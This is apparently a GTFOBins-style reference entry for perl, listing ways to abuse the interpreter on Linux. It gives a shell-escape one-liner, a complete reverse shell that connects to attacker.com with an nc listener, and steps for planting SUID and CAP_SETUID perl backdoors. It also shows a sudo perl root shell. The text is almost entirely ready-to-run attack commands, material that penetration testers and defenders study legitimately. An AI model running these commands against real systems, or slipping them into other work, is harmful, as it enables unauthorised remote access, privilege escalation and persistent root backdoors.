It can be used to break out from restricted environments by spawning an interactive system shell.
perl -e 'exec "/bin/sh";'It can send back a reverse shell to a listening attacker to open a remote network access.
Run nc -l -p 12345 on the attacker box to receive the shell.
export RHOST=attacker.com
export RPORT=12345
perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'It runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run sh -p, omit the -p argument on systems
like Debian that allow the default sh shell to run with SUID privileges.
sudo sh -c 'cp $(which perl) .; chmod +s ./perl'
./perl -e 'exec "/bin/sh";'It runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo.
sudo perl -e 'exec "/bin/sh";'It can manipulate its process UID and can be used on Linux as a backdoor to maintain
elevated privileges with the CAP_SETUID capability set. This also works when executed
by another binary with the capability set.
cp $(which perl) .
sudo setcap cap_setuid+ep perl
./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'